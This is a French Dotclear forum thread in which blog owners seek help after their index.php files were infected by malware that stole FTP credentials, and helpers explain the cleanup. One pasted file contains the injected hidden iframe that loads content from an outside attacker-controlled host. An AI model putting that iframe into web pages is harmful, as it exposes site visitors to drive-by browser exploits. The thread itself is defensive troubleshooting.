Vous n'êtes pas identifié(e).
13 février 2024 Sortie de Dotclear 2.29
Pages : 1
Bonjour,
L'antivirus de mon PC detecte un virus sur la page suivante :
http://www.horlogerie-comtoise.fr
J'ai fait ce blog avec DotClear 2, hebergé chez 1&1. L'erreur est la suivante :
HTML/Infected.WebPage.Gen
Il semble que le pb soit avec tous les fichiers index.php des dossiers présents sur le serveur.
J'ai essayé d'écraser le fichier index.php avec la version disponible dans le .zip d'installation de DotClear, mais le pb reste le même.
Que faire ?
Le résultat de VirusTotal est le suivant :
Antivirus Version Dernière mise à jour Résultat
a-squared 4.5.0.24 2009.09.09 -
AhnLab-V3 5.0.0.2 2009.09.09 -
AntiVir 7.9.1.12 2009.09.09 HTML/Infected.WebPage.Gen
Antiy-AVL 2.0.3.7 2009.09.09 -
Authentium 5.1.2.4 2009.09.08 -
Avast 4.8.1351.0 2009.09.08 -
AVG 8.5.0.409 2009.09.09 -
BitDefender 7.2 2009.09.09 -
CAT-QuickHeal 10.00 2009.09.09 -
ClamAV 0.94.1 2009.09.09 -
Comodo 2261 2009.09.09 -
DrWeb 5.0.0.12182 2009.09.09 -
eSafe 7.0.17.0 2009.09.08 -
eTrust-Vet 31.6.6726 2009.09.08 -
F-Prot 4.5.1.85 2009.09.08 -
F-Secure 8.0.14470.0 2009.09.09 -
Fortinet 3.120.0.0 2009.09.09 -
GData 19 2009.09.09 -
Ikarus T3.1.1.72.0 2009.09.09 -
Jiangmin 11.0.800 2009.09.09 -
K7AntiVirus 7.10.839 2009.09.08 -
Kaspersky 7.0.0.125 2009.09.09 -
McAfee 5735 2009.09.08 -
McAfee+Artemis 5735 2009.09.08 -
McAfee-GW-Edition 6.8.5 2009.09.09 Heuristic.Script.Infected.WebPage
Microsoft 1.5005 2009.09.09 -
NOD32 4408 2009.09.09 -
Norman 6.01.09 2009.09.08 -
nProtect 2009.1.8.0 2009.09.08 -
Panda 10.0.2.2 2009.09.08 -
PCTools 4.4.2.0 2009.09.07 -
Prevx 3.0 2009.09.09 -
Rising 21.46.21.00 2009.09.09 -
Sophos 4.45.0 2009.09.09 -
Sunbelt 3.2.1858.2 2009.09.09 -
Symantec 1.4.4.12 2009.09.09 -
TheHacker 6.3.4.3.399 2009.09.09 -
TrendMicro 8.950.0.1094 2009.09.09 -
VBA32 3.12.10.10 2009.09.08 -
ViRobot 2009.9.9.1924 2009.09.09 -
VirusBuster 4.6.5.0 2009.09.08 -
Information additionnelle
File size: 805 bytes
MD5...: 39ad119ac59642959b84058b397b4f4e
SHA1..: 9d0613d4679ca3afb298fcf304e5f8d7787dc6c8
SHA256: 4dfc2f3f723021c6aec4175770528cdbe4fe44da8461fbae128c2971f4615698
ssdeep: 12:1J6FVlQoBTyGa22LFwE+ggoGfw6wT6ORKaFOr7NkRs9dOO2hGpAR1osx:b+Qo<BR>q22LFPnxwrqyn2hu8<BR>
PEiD..: -
PEInfo: -
RDS...: NSRL Reference Data Set<BR>-
pdfid.: -
trid..: HyperText Markup Language (100.0%)
Hors ligne
Moi je pencherais pour un faux positif ? :)
Heu... pas forcément, on a parlé sur ce forum d'un ver qui s'attaquait à FileZilla et modifiait les index.php des sites. Je pense qu'avec une recherche il est possible de retrouve le/les sujets.
Hors ligne
Peux-tu supprimer tous les appels à des js ? Tu as une redirection par frame ?
... et le ver ajoutait du javascript dans les index.php pour ouvrir une frame...
Hors ligne
Merci pour vos réponses si promptes !
Le fichier index.php infecté situé sur la racine est le suivant :
<?php
# -- BEGIN LICENSE BLOCK ----------------------------------
#
# This file is part of Dotclear 2.
#
# Copyright (c) 2003-2008 Olivier Meunier and contributors
# Licensed under the GPL version 2.0 license.
# See LICENSE file or
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
#
# -- END LICENSE BLOCK ------------------------------------
if (isset($_SERVER['DC_BLOG_ID'])) {
define('DC_BLOG_ID',$_SERVER['DC_BLOG_ID']);
} if (isset($_SERVER['REDIRECT_DC_BLOG_ID'])) {
define('DC_BLOG_ID',$_SERVER['REDIRECT_DC_BLOG_ID']);
}else {
# Define your blog here
define('DC_BLOG_ID','default');
}
require dirname(__FILE__).'/inc/public/prepend.php';
?>
<iframe src="http://ilana223.servebeer.com:8080/ts/in.cgi?open6" width=864 height=0 style="visibility: hidden"></iframe>
La dernière ligne n'existe pas dans le fichier tiré directement du .zip d'installation.
Mais le problème est que tous les fichiers index.php sont touchés (20 environ) et qu'ils sont souvent beaucoup plus complexes.
Comment réinstaller toute l'arborescence sans écraser le contenu du blog ?
Hors ligne
C'est bien le cas dont je parlais. Il faut dans l'ordre :
Désinstaller le logiciel de ftp (qui est sans doute FileZilla ?)
Faire passer l'antivirus sur ton poste de travail
Réinstaller une archive propre du logiciel de ftp
Supprimer tous les fichiers du serveur web, en ayant pris garde de sauvegarder le fichier de configuration de Doctlear et tes fichiers pesonnels (public, thèmes et plugins éventuellement)
Renvoyer sur le serveur une archive propre de Dotclear en remettant le fichier de configuration (inc/config.php) préalablment sauvegardé
Les données de ton blog étant dans la base de données ça ne devrait pas poser de problème, mais fais une sauvegarde avant avec le plugin import/export quand même ;)
Hors ligne
En fait, les étapes à suivre :
1. Passer un coup d'antivirus sur sa machine
2. Passer aussi un coup de spybot et vérifier via hijackthis que tout va bien
3. Rebooter
4. Changer ses mots de passe FTP/mysql
5. réuploader une archive de dotclear proprement sur le site.
Le malware qui sévit en ce moment écoute le protocole FTP et envoie les hosts/login/mots de passe qu'il a capturés vers un autre site. Tous les logiciels de FTP sont donc potentiellement vulnérable si le malware est actif. Il ne reste plus qu'aux personnes malveillantes de scanner les espaces FTP ainsi récupérés et de patcher les fichiers php en mettant des iframes exploitant des failles adobe par exemple, et s'infiltrant sur les pc d'autres victimes pas à jour dans leurs plugins...
Solution alternative en remplacement des étapes 1 à 3:
1. Installer un OS décent
Dyslexics have more fnu!
Hors ligne
J'utilise FTP Commander 7.40, je pense qu'il faut passer à la version 8.0 ?
Comment faire pour être certain de ne pas écraser le contenu du blog lors de l'upload de dotclear ? Où se trouvent les données ?
Cordialement
Hors ligne
Tu es sous Windows ? Si tu n'as pas d'antivirus tu peux scanner ton ordinateur gratuitement ici.
Le contenu du blog (billets, commentaires, réglages) est stocké dans la base de données. Les fichiers PHP et HTML servent à afficher ce contenu.
On sauvegarde la base de données avec le plugin import/Export ou phpMyAdmin et les fichiers PHP et HTML par FTP. Ça répond à ta question ?
- les règles du forum : http://forum.dotclear.net/viewtopic.php?id=39494
- la galaxie de Dotclear 2 : http://fr.dotclear.org/documentation/2.0/links
Hors ligne
Bonjour,
J’ai désinstallé FTP Commander et réinstallé FTP Commander 8.0.
Désinstallé puis réinstallé les dernières versions de Adobe Reader et Adobe Flash Player.
Scanné avec Avira Antivir mon PC
Changé mes mots de passe FTP
Par contre, j’ai encore un doute sur la version de DotClear que je dois uploader.
La version actuelle est 2.1.5 je sais que j’utilisais DotClear 2. Existe–t-il un risque d’incompatibilité ?
Merci
Cordialement
Hors ligne
Voilà le résultat de HijackThis, je ne suis pas certain de savoir si tout est normal.
Qu'en pensez-vous ?
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:14:19, on 11/09/2009
Platform: Windows Vista (WinNT 6.00.1904)
MSIE: Internet Explorer v7.00 (7.00.6000.16890)
Boot mode: Normal
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\HP\QuickPlay\QPService.exe
C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\taskeng.exe
C:\PROGRA~1\HEWLET~1\Shared\HPQTOA~1.EXE
C:\Windows\system32\wuauclt.exe
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
C:\Download\HiJackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE= … &pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE= … &pf=laptop
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [QPService] "C:\Program Files\HP\QuickPlay\QPService.exe"
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [HP Health Check Scheduler] C:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
O4 - HKLM\..\Run: [WAWifiMessage] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\RunOnce: [Launcher] %WINDIR%\SMINST\launcher.exe
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O13 - Gopher Prefix:
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://appldnld.apple.com.edgesuite.net … plugin.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O23 - Service: AddFiltr - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\AddFiltr.exe
O23 - Service: Avira AntiVir Planificateur (AntiVirSchedulerService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: CyberLink Background Capture Service (CBCS) (CLCapSvc) - Unknown owner - C:\Program Files\HP\QuickPlay\Kernel\TV\CLCapSvc.exe
O23 - Service: CyberLink Task Scheduler (CTS) (CLSched) - Unknown owner - C:\Program Files\HP\QuickPlay\Kernel\TV\CLSched.exe
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - c:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard - C:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Roxio\Roxio MyDVD Basic v9\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe
--
End of file - 7098 bytes
Hors ligne
http://www.hijackthis.de/fr n'a pas l'air de râler là-dessus ...
Dyslexics have more fnu!
Hors ligne
J'ai donc ensuite :
- supprimé tous les dossier du blog (sauf le dossier logs pour lequel je n'ai pas les droits suffisants et sauf le dossier public qui contient un assez gros volume d'images).
- dezippé sur mon PC DotClear.zip version 2.1.5
- uploadé avec FTP Command 8.0 les dossiers Dotclear
-copié les fichiers .htacces et inc/config.php que j'avais sauvegardés
et ça marche à nouveau normalement :
http://www.horlogerie-comtoise.fr
Merci pour l'aide !
Cordialement
Hors ligne
Bonjour,
J'ai exactement le même problème sur mes 2 blogs
http://leblogdeluna.free.fr/ecrire/
et http://libellul.free.fr/blog/index.php
je m'occupe du blogdeluna en priorité, l'autre je verrai plus tard...
j'avais posté hier dans le forum dotclear 1 : http://forum.dotclear.net/viewtopic.php … 32#p264432 pour expliquer ce qui m'arrive en détail et ce que j'ai déjà essayé de faire pour arranger les choses et je suis redirigé ici, par contre je suis entièrement novice, je bloque au point 2 comment analyser mon poste de travail avec antivir
Je viens de lancer un controle systéme intégral, pour l'instant il est à 4% donc j'attend les résultats
Je viens de désinstaller mon logiciel ftp cuteftp et j'ai installer filezilla à la place, j'ai changé également le mot de passe.
pour la suite :
"Supprimer tous les fichiers du serveur web, en ayant pris garde de sauvegarder le fichier de configuration de Doctlear et tes fichiers pesonnels (public, thèmes et plugins éventuellement)
Renvoyer sur le serveur une archive propre de Dotclear en remettant le fichier de configuration (inc/config.php) préalablment sauvegardé
Les données de ton blog étant dans la base de données ça ne devrait pas poser de problème, mais fais une sauvegarde avant avec le plugin import/export quand même"
je suis sous dotclear 1 et je flippe comme une malade de perdre mon blog, j'aurais besoin, s'il y a une bonne âme dans le coin d'être guidé pas à pas pour cette procédure... car je n'y connais rien du tout ( j'avais installer tout ça grâce à des tutos mais dès le moindre probléme y'a plus personne...) Si c'est possible de passer du même coup sous dotclear 2 je suis partante pendant ou même après en gardant la même mise en page?
merci d'avance pour votre aide! :o)
Hors ligne
j'ai trouvé le tutoriel comment migrer de dotclear 1 à dotclear 2 pour les nuls, pensez vous que si je le fasse à la lettre le fait de migrer va éliminer mon problème?
Hors ligne
hors mis ton problème de virus etc
il est certain que migrer peut etre benefique pour toi
dotclear 1 n'a plus de maintenance
dotclear 2 lui (je suppose) doit etre plus sécurisé
dotclear 2 est en pleine expention (thèmes plugin..etc)
et surtout l'accessibilité...le coté admin etc bref...pour avoir commencer aussi sur dc1...le dc2 est une pure merveille.
Pour en revenir a ton problème de virus...
je pense que tu aurait du effectuer toutes ses opérations après (et uniquement après) avoir été certain d'avoir scanner ton post de travail et d'avoir dévérolé (ou pas) tout ca.
et pour te répondre...le virus qui ajoute des frames bien souvent dans le "index.php" est souvent un virus qui s'attaque non pas a dotclear lui-meme au pc
et il récupère les pass ftp etc
donc dotclear n'est en rien la cause ou la solution ...
mais passer au dc2 pourrait être un nouveaux souffle pour toi...
(reste a savoir si la migration ne sera pas trop dure selon ta configuration, ton thème, tes plugins etc)
Hors ligne
Merci pour ta réponse! J'ai scanné mon systéme avec antivir et avec malwarebyte, j'ai trouvé comment scanner le poste de travail je suis en train de le faire en ce moment.
j'ai installé un nouveau logiciel ftp et changé mon mdp,
ensuite pour la migration, je sais pas si ça va être dur ou pas, mon blog est plutôt simple donc peut être ça ne sera pas trop dur et que je pourrai à nouveau accéder à l'admin car pour l'instant c'est mort : http://leblogdeluna.free.fr/ecrire/
Hors ligne
Pages : 1
Vous n'êtes pas identifié(e).